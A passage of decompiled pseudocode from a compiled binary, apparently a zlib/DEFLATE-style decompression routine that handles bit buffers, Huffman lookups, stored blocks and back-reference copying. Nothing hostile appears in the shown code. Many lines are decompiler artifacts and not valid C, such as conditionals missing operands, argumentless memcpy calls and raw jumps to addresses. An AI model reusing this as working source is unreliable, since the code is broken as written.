												_t612 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
												 *(_t1065 - 0x1c) = _t612;
												__eflags = _t612;
												if(_t612 < 0) {
													L5:
													goto 0x4212ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t614 = _t968 >> _t863;
														_t863 = _t863 + 1;
														_t847 =  *((short*)(_t1030 + 0x1700 + ((_t614 & 0x00000001) +  !_t847) * 2));
														__eflags = _t847;
													} while (_t847 < 0);
													 *(_t1065 - 0x1c) = _t847;
													_t847 =  *(_t1065 - 0x18);
													_t617 =  *(_t1065 - 0x1c);
												} else {
													L4:
													_t863 = _t612 >> 9;
													_t617 = _t612 & 0x000001ff;
												}
												L9:
												_t968 = _t968 >> _t863;
												_t1050 = _t1050 - _t863;
												_t864 =  *(0x411090 + _t617 * 4);
												_t618 =  *(0x411110 + _t617 * 4);
												 *(_t1065 - 4) = _t968;
												 *(_t1065 - 0x38) = _t864;
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t864;
												if(_t864 == 0) {
													L15:
													_t866 =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 + 0xc));
													 *((intOrPtr*)(_t1065 - 0x48)) = _t866;
													__eflags = _t618 - _t866;
													if(_t618 <= _t866) {
														L17:
														_t1030 =  *(_t1065 - 0x14);
														_t869 = (_t866 - _t618 &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc));
														__eflags =  *(_t1065 - 0x10) - _t869;
														 *(_t1065 - 0xc) = _t869;
														_t620 =  >  ?  *(_t1065 - 0x10) : _t869;
														_t870 =  *(_t1065 - 8);
														_t621 = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870;
														__eflags = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870 -  *((intOrPtr*)(_t1065 - 0x40));
														if(( >  ?  *(_t1065 - 0x10) : _t869) + _t870 <=  *((intOrPtr*)(_t1065 - 0x40))) {
															L21:
															__eflags = _t870 - 9;
															if(_t870 < 9) {
																L30:
																goto 0x4212f7;
																asm("int3");
																do {
																	L32:
																	_t870 = _t870 - 3;
																	 *_t1030 =  *_t968 & 0x000000ff;
																	 *((char*)(_t1030 + 1)) =  *(_t968 + 1) & 0x000000ff;
																	_t624 =  *(2 + _t968) & 0x000000ff;
																	_t968 = _t968 + 3;
																	 *(2 + _t1030) = _t624;
																	_t1030 = _t1030 + 3;
																	__eflags = _t870 - 2;
																} while (_t870 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t870 -  *(_t1065 - 0x28);
																if(_t870 >  *(_t1065 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1041 =  *(_t1065 - 0xc);
																	_t871 =  *(_t1065 - 0x10);
																	_t738 = _t1041 + (_t870 & 0xfffffff8);
																	 *(_t1065 - 0x24) = _t738;
																	_t1025 = _t738;
																	do {
																		L24:
																		 *_t871 =  *_t1041;
																		_t740 =  *((intOrPtr*)(_t1041 + 4));
																		_t1041 = _t1041 + 8;
																		 *((intOrPtr*)(_t871 + 4)) = _t740;
																		_t871 = _t871 + 8;
																		__eflags = _t1041 - _t1025;
																	} while (_t1041 < _t1025);
																	_t968 =  *(_t1065 - 4);
																	 *(_t1065 - 0x10) = _t871;
																	_t870 =  *(_t1065 - 8) & 0x00000007;
																	 *(_t1065 - 0xc) = _t1041;
																	_t1030 =  *(_t1065 - 0x14);
																	 *(_t1065 - 8) = _t870;
																	__eflags = _t870 - 3;
																	if(_t870 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t741 = _t870;
																_t870 = _t870 - 1;
																 *(_t1065 - 8) = _t870;
																__eflags = _t741;
																if(_t741 == 0) {
																	goto L39;
																}
																L19:
																__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																	L238:
																	 *(_t1065 - 0xc) = 2;
																	 *_t1030 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																	 *((intOrPtr*)(_t1065 - 0x48)) =  *((intOrPtr*)(_t1065 - 0x48)) + 1;
																	 *( *(_t1065 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1065 - 0x48)) -  *(_t1065 - 0x28) &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc))));
																	_t968 =  *(_t1065 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t860 =  *(_t1065 - 0x20) - _t847;
																__eflags = _t860 - 4;
																if(_t860 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L16:
														__eflags =  *(_t1065 + 0x18) & 0x00000004;
														if(( *(_t1065 + 0x18) & 0x00000004) != 0) {
															L270:
															_t689 = _t618 | 0xffffffff;
															 *_t1030 = 0x25;
															goto L291;
														} else {
															goto L17;
														}
													}
												} else {
													L10:
													__eflags = _t1050 - _t864;
													if(_t1050 >= _t864) {
														L13:
														_t1050 = _t1050 - _t864;
														_t749 = (_t618 << _t864) - 0x00000001 & _t968;
														_t968 = _t968 >> _t864;
														_t28 = _t1065 - 0x28;
														 *_t28 =  *(_t1065 - 0x28) + _t749;
														__eflags =  *_t28;
														_t618 =  *(_t1065 - 0x28);
														 *(_t1065 - 4) = _t968;
														goto L15;
													} else {
														while(1) {
															L11:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L12:
															_t618 = ( *_t847 & 0x000000ff) << _t1050;
															_t847 = _t847 + 1;
															_t864 =  *(_t1065 - 0x38);
															_t968 = _t968 | _t618;
															_t1050 = _t1050 + 8;
															 *(_t1065 - 0x18) = _t847;
															 *(_t1065 - 4) = _t968;
															__eflags = _t1050 - _t864;
															if(_t1050 < _t864) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														L263:
														 *_t1030 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1065 - 0x20) - _t847 - 2;
												if( *(_t1065 - 0x20) - _t847 >= 2) {
													L237:
													_t991 =  *(_t847 + 1) & 0x000000ff;
													_t753 =  *_t847 & 0x000000ff;
													_t847 = _t847 + 2;
													_t1030 =  *(_t1065 - 0x14);
													_t863 = _t1050;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) =  *(_t1065 - 4) | _t991 << _t1050 + 0x00000008 | _t753 << _t863;
													_t1050 = _t1050 + 0x10;
													_t968 =  *(_t1065 - 4);
												} else {
													do {
														L227:
														_t618 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
														 *(_t1065 - 0x24) = _t618;
														__eflags = _t618;
														if(_t618 < 0) {
															L231:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1065 - 0x1c) = _t863;
																while(1) {
																	L234:
																	_t863 =  *((short*)(_t1030 + 0x1700 + ((_t968 >> _t863 & 0x00000001) +  !( *(_t1065 - 0x24))) * 2));
																	_t764 =  *(_t1065 - 0x1c) + 1;
																	 *(_t1065 - 0x24) = _t863;
																	 *(_t1065 - 0x1c) = _t764;
																	__eflags = _t863;
																	if(_t863 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t618 = _t764 + 1;
																	__eflags = _t1050 - _t618;
																	if(_t1050 < _t618) {
																		goto L1;
																	} else {
																		L236:
																		_t863 =  *(_t1065 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t618 = _t618 >> 9;
															__eflags = _t618;
															if(_t618 == 0) {
																L1:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L264:
																	 *_t1030 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t863 = _t1050;
														_t758 = ( *_t847 & 0x000000ff) << _t863;
														_t847 = _t847 + 1;
														_t968 = _t968 | _t758;
														 *(_t1065 - 0x18) = _t847;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 4) = _t968;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1050 - _t863;
											if(_t1050 >= _t863) {
												L223:
												L224:
												_t1050 = _t1050 - _t863;
												_t767 = (_t609 << _t863) - 0x00000001 & _t968;
												_t968 = _t968 >> _t863;
												_t456 = _t1065 - 8;
												 *_t456 =  *(_t1065 - 8) + _t767;
												__eflags =  *_t456;
												 *(_t1065 - 4) = _t968;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L222:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t863 =  *(_t1065 - 0x38);
													_t968 = _t968 | _t618;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - _t863;
													if(_t1050 < _t863) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1030 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1030 + 0x14) & 0x00000001;
											if(( *(_t1030 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1050 - 3;
											if(_t1050 >= 3) {
												L89:
												_t1050 = _t1050 - 3;
												_t698 = _t968 & 0x00000007;
												_t999 = _t968 >> 3;
												 *(_t1030 + 0x14) = _t698;
												_t699 = _t698 >> 1;
												__eflags = _t699;
												 *(_t1065 - 4) = _t999;
												 *(_t1065 - 0x1c) = _t1050;
												 *(_t1030 + 0x18) = _t699;
												if(_t699 != 0) {
													L124:
													__eflags = _t699 - 3;
													if(_t699 == 3) {
														L266:
														 *(_t1065 - 0xc) = 0xffffffff;
														 *_t1030 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t699 - 1;
														if(__eflags != 0) {
															L127:
															_t901 = 0;
															__eflags = 0;
															while(1) {
																L128:
																 *(_t1065 - 8) = _t901;
																__eflags = _t901 - 3;
																if(_t901 >= 3) {
																	break;
																}
																L129:
																_t618 =  *((char*)(_t901 + 0x411004));
																 *(_t1065 - 0x1c) = _t618;
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	L132:
																	_t1015 = _t1030 + _t901 * 4;
																	_t1036 =  *(_t1065 - 4);
																	 *(_t1015 + 0x2c) = (0x00000001 <<  *(_t1065 - 0x1c)) - 0x00000001 & _t1036;
																	_t707 =  *(_t1065 - 8);
																	_t940 =  *((char*)(_t707 + 0x411004));
																	_t1037 = _t1036 >> _t940;
																	_t1050 = _t1050 - _t940;
																	_t941 = _t707;
																	 *(_t1065 - 4) = _t1037;
																	 *(_t1065 - 0x1c) = _t1050;
																	 *(_t1015 + 0x2c) =  *(_t1015 + 0x2c) +  *((intOrPtr*)(0x411a38 + _t941 * 4));
																	_t999 = _t1037;
																	_t1030 =  *(_t1065 - 0x14);
																	_t901 = _t941 + 1;
																	continue;
																} else {
																	while(1) {
																		L130:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L131:
																		_t710 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t901 =  *(_t1065 - 8);
																		_t999 = _t999 | _t710;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 0x18) = _t847;
																		 *(_t1065 - 4) = _t999;
																		_t618 =  *((char*)(_t901 + 0x411004));
																		 *(_t1065 - 0x1c) = _t618;
																		__eflags = _t1050 - _t618;
																		if(_t1050 < _t618) {
																			continue;
																		} else {
																			goto L132;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1030 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L133:
															L134:
															_t618 = memset(_t1030 + 0x1b80, 0, ??);
															_t1000 =  *(_t1065 - 4);
															_t1068 = _t1068 + 0xc;
															_t902 = 0;
															__eflags = 0;
															while(1) {
																L135:
																 *(_t1065 - 8) = _t902;
																__eflags = _t902 -  *((intOrPtr*)(_t1030 + 0x34));
																if(__eflags >= 0) {
																	break;
																}
																L136:
																__eflags = _t1050 - 3;
																if(_t1050 >= 3) {
																	L139:
																	_t936 = _t1000 & 0x00000007;
																	_t1000 = _t1000 >> 3;
																	_t1050 = _t1050 - 3;
																	 *(_t1065 - 4) = _t1000;
																	 *(_t1065 - 0x1c) = _t1050;
																	_t618 =  *( *(_t1065 - 8) + 0x411a24) & 0x000000ff;
																	 *(_t1030 + 0x1b80 + _t618) = _t936;
																	_t902 =  *(_t1065 - 8) + 1;
																	continue;
																} else {
																	while(1) {
																		L137:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L138:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t1000 = _t1000 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t1000;
																		__eflags = _t1050 - 3;
																		if(_t1050 < 3) {
																			continue;
																		} else {
																			goto L139;
																		}
																		goto L295;
																	}
																	L249:
																	 *_t1030 = 0xe;
																	goto L285;
																}
																goto L295;
															}
															L140:
															 *((intOrPtr*)(_t1030 + 0x34)) = 0x13;
															goto L141;
														} else {
															L126:
															goto 0x4213af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t699 + 0x2c)) = 0x120;
															goto L0;
														}
													}
												} else {
													L90:
													_t618 = _t1050 & 0x00000007;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														L93:
														_t944 = _t1050 & 0x00000007;
														_t968 = _t999 >> _t944;
														_t1050 = _t1050 - _t944;
														 *(_t1065 - 4) = _t968;
														_t945 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1065 - 8) = _t945;
															__eflags = _t945 - 4;
															if(_t945 >= 4) {
																break;
															}
															L95:
															__eflags = _t1050;
															if(_t1050 == 0) {
																L101:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L244:
																	 *_t1030 = 7;
																	goto L285;
																} else {
																	L102:
																	_t618 =  *_t847;
																	_t847 = _t847 + 1;
																	(_t1030 + 0x2920)[_t945] = _t618;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 0x18) = _t847;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1050 - 8;
																if(_t1050 >= 8) {
																	L100:
																	(_t1030 + 0x2920)[_t945] = _t968;
																	_t1050 = _t1050 - 8;
																	_t968 = _t968 >> 8;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 4) = _t968;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L98:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t968 = _t968 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t968;
																		__eflags = _t1050 - 8;
																		if(_t1050 < 8) {
																			continue;
																		} else {
																			L99:
																			_t945 =  *(_t1065 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1030 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t618 =  *(_t1030 + 0x2922) & 0x000000ff;
														 *(_t1065 - 8) = ( *(_t1030 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1030 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1065 - 8) - ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff);
														if( *(_t1065 - 8) != ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff)) {
															L265:
															 *(_t1065 - 0xc) = 0xffffffff;
															 *_t1030 = 0x27;
															goto L292;
														} else {
															L104:
															_t953 =  *(_t1065 - 8);
															while(1) {
																L105:
																__eflags = _t953;
																if(_t953 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1050;
																if(_t1050 == 0) {
																	L113:
																	_t618 =  *(_t1065 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t953;
																		if(_t953 == 0) {
																			break;
																		}
																		L116:
																		_t1016 =  *((intOrPtr*)(_t1065 - 0x40));
																		__eflags = _t618 - _t1016;
																		if(_t618 < _t1016) {
																			L118:
																			_t618 =  *(_t1065 - 0x20);
																			__eflags = _t847 - _t618;
																			if(_t847 >= _t618) {
																				L247:
																				_t1030 =  *(_t1065 - 0x14);
																				 *_t1030 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t968 = _t1016 -  *(_t1065 - 0x10);
																				_t1039 = _t618 - _t847;
																				__eflags = _t968 - _t1039;
																				_t715 =  <  ? _t968 : _t1039;
																				__eflags = ( <  ? _t968 : _t1039) - _t953;
																				if(( <  ? _t968 : _t1039) >= _t953) {
																					_t1030 = _t953;
																				} else {
																					__eflags = _t968 - _t1039;
																					_t1030 =  <  ? _t968 : _t1039;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t847 = _t847 + _t1030;
																				_t618 =  *(_t1065 - 0x10) + _t1030;
																				_t1068 = _t1068 + 0xc;
																				 *(_t1065 - 0x18) = _t847;
																				_t953 =  *(_t1065 - 8) - _t1030;
																				 *(_t1065 - 0x10) = _t618;
																				 *(_t1065 - 8) = _t953;
																				continue;
																			}
																		} else {
																			L117:
																			_t1030 =  *(_t1065 - 0x14);
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x421388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1050 - 8;
																	if(_t1050 >= 8) {
																		L110:
																		_t618 = _t968 & 0x000000ff;
																		_t968 = _t968 >> 8;
																		_t1050 = _t1050 - 8;
																		 *(_t1065 - 0x28) = _t618;
																		 *(_t1065 - 4) = _t968;
																		L111:
																		__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																		_t1030 =  *(_t1065 - 0x14);
																		if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																			L246:
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																			 *( *(_t1065 - 0x10)) = _t618;
																			_t953 =  *(_t1065 - 8) - 1;
																			 *(_t1065 - 8) = _t953;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t847 -  *(_t1065 - 0x20);
																			if(_t847 >=  *(_t1065 - 0x20)) {
																				break;
																			}
																			L109:
																			_t618 = ( *_t847 & 0x000000ff) << _t1050;
																			_t847 = _t847 + 1;
																			_t968 = _t968 | _t618;
																			 *(_t1065 - 0x18) = _t847;
																			_t1050 = _t1050 + 8;
																			 *(_t1065 - 4) = _t968;
																			__eflags = _t1050 - 8;
																			if(_t1050 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1030 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L92:
															_t721 = ( *_t847 & 0x000000ff) << _t1050;
															_t1050 = _t1050 + 8;
															_t999 = _t999 | _t721;
															_t847 = _t847 + 1;
															 *(_t1065 - 0x18) = _t847;
															_t618 = _t1050 & 0x00000007;
															 *(_t1065 - 4) = _t999;
															__eflags = _t1050 - _t618;
															if(_t1050 < _t618) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1030 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L88:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t968 = _t968 | _t618;
													 *(_t1065 - 0x18) = _t847;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - 3;
													if(_t1050 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1030 = 3;
												L285:
												__eflags =  *(_t1065 + 0x18) & 0x00000002;
												L286:
												L287:
												_t628 =  !=  ? 1 : _t618;
												 *(_t1065 - 0xc) = _t628;
												__eflags = _t628 - 1;
												if(_t628 != 1) {
													L288:
													__eflags = _t628 - 0xfffffffc;
													if(_t628 != 0xfffffffc) {
														L289:
														L292:
														_t673 =  *(_t1065 - 0x3c);
														__eflags = _t847 - _t673;
														if(_t847 > _t673) {
															while(1) {
																L293:
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	goto L295;
																}
																L294:
																_t847 = _t847 - 1;
																_t1050 = _t1050 - 8;
																__eflags = _t847 - _t673;
																if(_t847 > _t673) {
																	continue;
																}
																goto L295;
															}
														}
													}
												}
											}
											goto L295;
										}
										L252:
										_t618 = _t1050 & 0x00000007;
										__eflags = _t1050 - _t618;
										if(_t1050 >= _t618) {
											L256:
											_t688 =  *(_t1065 - 0x3c);
											_t894 = _t1050 & 0x00000007;
											_t994 = _t968 >> _t894;
											_t1050 = _t1050 - _t894;
											 *(_t1065 - 4) = _t994;
											__eflags = _t847 - _t688;
											if(_t847 > _t688) {
												while(1) {
													L257:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L259;
													}
													L258:
													_t847 = _t847 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t847 - _t688;
													if(_t847 > _t688) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t618 = _t1050;
											asm("bts edx, eax");
											__eflags = _t618 - 0x20;
											_t896 =  >=  ? _t994 : 0;
											_t995 = _t994 ^ _t896;
											__eflags = _t618 - 0x40;
											_t897 =  >=  ? _t995 : _t896;
											 *(_t1065 - 4) =  *(_t1065 - 4) & _t995 - 0x00000001;
											__eflags =  *(_t1065 + 0x18) & 0x00000001;
											if(( *(_t1065 + 0x18) & 0x00000001) == 0) {
												L290:
												_t689 = 0;
												__eflags = 0;
												 *_t1030 = 0x22;
												L291:
												 *(_t1065 - 0xc) = _t689;
												goto L292;
											} else {
												L261:
												_t898 = 0;
												while(1) {
													L277:
													 *(_t1065 - 8) = _t898;
													__eflags = _t898 - 4;
													if(_t898 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1050;
													if(_t1050 != 0) {
														L281:
														_t997 =  *(_t1065 - 4);
														__eflags = _t1050 - 8;
														if(_t1050 >= 8) {
															L275:
															_t690 = _t997 & 0x000000ff;
															_t1050 = _t1050 - 8;
															__eflags = _t1050;
															 *(_t1065 - 4) = _t997 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	break;
																}
																L273:
																_t618 = ( *_t847 & 0x000000ff) << _t1050;
																_t1050 = _t1050 + 8;
																_t997 = _t997 | _t618;
																_t847 = _t847 + 1;
																 *(_t1065 - 4) = _t997;
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	continue;
																} else {
																	L274:
																	_t898 =  *(_t1065 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1030 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															L283:
															 *_t1030 = 0x2a;
															goto L285;
														} else {
															L280:
															_t690 =  *_t847 & 0x000000ff;
															_t847 = _t847 + 1;
															L276:
															 *(_t1065 - 0x24) = _t690;
															_t618 =  *(_t1030 + 0x10) << 0x00000008 |  *(_t1065 - 0x24);
															_t898 = _t898 + 1;
															__eflags = _t898;
															 *(_t1030 + 0x10) = _t618;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													break;
												}
												L255:
												_t695 = ( *_t847 & 0x000000ff) << _t1050;
												_t1050 = _t1050 + 8;
												_t968 = _t968 | _t695;
												_t847 = _t847 + 1;
												 *(_t1065 - 4) = _t968;
												_t618 = _t1050 & 0x00000007;
												__eflags = _t1050 - _t618;
												if(_t1050 < _t618) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1030 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1050 - 0xf;
									if(_t1050 < 0xf) {
										_t1021 =  *(_t847 + 1) & 0x000000ff;
										_t861 = _t1050;
										_t732 =  *_t847 & 0x000000ff;
										_t847 = _t847 + 2;
										_t1030 =  *(_t1065 - 0x14);
										 *(_t1065 - 0x18) = _t847;
										 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1021 << 0x00000008 | _t732) << _t861;
										_t1050 = _t1050 + 0x10;
										__eflags = _t1050;
										_t968 =  *(_t1065 - 4);
									}
									_t725 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
									 *(_t1065 - 0x1c) = _t725;
									__eflags = _t725;
									if(_t725 < 0) {
										L53:
										goto 0x421349;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t727 = _t968 >> _t861;
											_t861 = _t861 + 1;
											_t847 =  *((short*)(_t1030 + 0x960 + ((_t727 & 0x00000001) +  !_t847) * 2));
											__eflags = _t847;
										} while (_t847 < 0);
										 *(_t1065 - 0x1c) = _t847;
										_t847 =  *(_t1065 - 0x18);
									} else {
										L52:
										_t861 = _t725 >> 9;
									}
									L56:
									_t618 =  *(_t1065 - 8);
									_t1050 = _t1050 - _t861;
									_t968 = _t968 >> _t861;
									 *(_t1065 - 4) = _t968;
									 *( *(_t1065 - 0x10)) = _t618;
									_t861 =  *(_t1065 - 0x1c);
									__eflags = _t861 & 0x00000100;
									if((_t861 & 0x00000100) != 0) {
										L83:
										_t171 = _t1065 - 0x10;
										 *_t171 =  *(_t1065 - 0x10) + 1;
										__eflags =  *_t171;
										goto L84;
									} else {
										L57:
										_t730 =  *(_t1065 - 0x10);
										 *(_t730 + 1) = _t861;
										 *(_t1065 - 0x10) = _t730 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t860 =  *(_t1065 - 0x20) - _t847;
													__eflags = _t860 - 4;
													if(_t860 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t870;
											} while (_t870 == 0);
											goto 0x4212e3;
											asm("int3");
											_t734 =  *_t740;
											 *_t1030 = _t734;
											_t1030 =  *(_t1065 - 0x14);
											__eflags = _t870 - 1;
											if(_t870 > 1) {
												L29:
												L36:
												goto 0x42131f;
												asm("int3");
												 *(_t968 + 1) =  *((intOrPtr*)(_t734 + 1));
												_t968 =  *(_t1065 - 4);
											}
											L38:
											_t86 = _t1065 - 0x10;
											 *_t86 =  *(_t1065 - 0x10) + _t870;
											__eflags =  *_t86;
											while(1) {
												L39:
												_t860 =  *(_t1065 - 0x20) - _t847;
												__eflags = _t860 - 4;
												if(_t860 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1065 - 0x10) = _t1030;
											_t1030 =  *(_t1065 - 0x14);
											 *(_t1065 - 0xc) = _t968;
											_t968 =  *(_t1065 - 4);
											 *(_t1065 - 8) = _t870;
											__eflags = _t870;
										} while (_t870 <= 0);
										goto 0x42130b;
										asm("int3");
										_t734 =  *_t624;
										 *_t1030 = _t734;
										_t1030 =  *(_t1065 - 0x14);
										__eflags = _t870 - 1;
										if(_t870 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							L295:
							_t972 =  *(_t1065 - 4);
							L296:
							 *(_t1030 + 4) = _t1050;
							asm("bts ecx, esi");
							__eflags = _t1050 - 0x20;
							_t630 =  >=  ? 0 : 0;
							_t874 = 0 ^ _t630;
							__eflags = _t1050 - 0x40;
							_t631 =  >=  ? _t874 : _t630;
							 *(_t1030 + 0x20) =  *(_t1065 - 0x28);
							_t974 =  *(_t1065 - 0x10) -  *(_t1065 + 0x10);
							__eflags =  *(_t1065 + 0x18) & 0x00000009;
							 *(_t1030 + 0x24) =  *(_t1065 - 8);
							 *(_t1030 + 0x28) =  *(_t1065 - 0x38);
							 *((intOrPtr*)(_t1030 + 0x3c)) =  *((intOrPtr*)(_t1065 - 0x48));
							 *(_t1030 + 0x38) = _t874 - 0x00000001 & _t972;
							 *(_t1065 - 0x10) = _t974;
							 *((intOrPtr*)( *((intOrPtr*)(_t1065 + 8)))) = _t847 -  *(_t1065 - 0x3c);
							_t851 =  *(_t1065 - 0xc);
							 *( *(_t1065 + 0x14)) = _t974;
							if(( *(_t1065 + 0x18) & 0x00000009) != 0) {
								L297:
								__eflags = _t851;
								if(_t851 >= 0) {
									L298:
									_t1052 =  *(_t1030 + 0x1c);
									_t877 = _t1052 & 0x0000ffff;
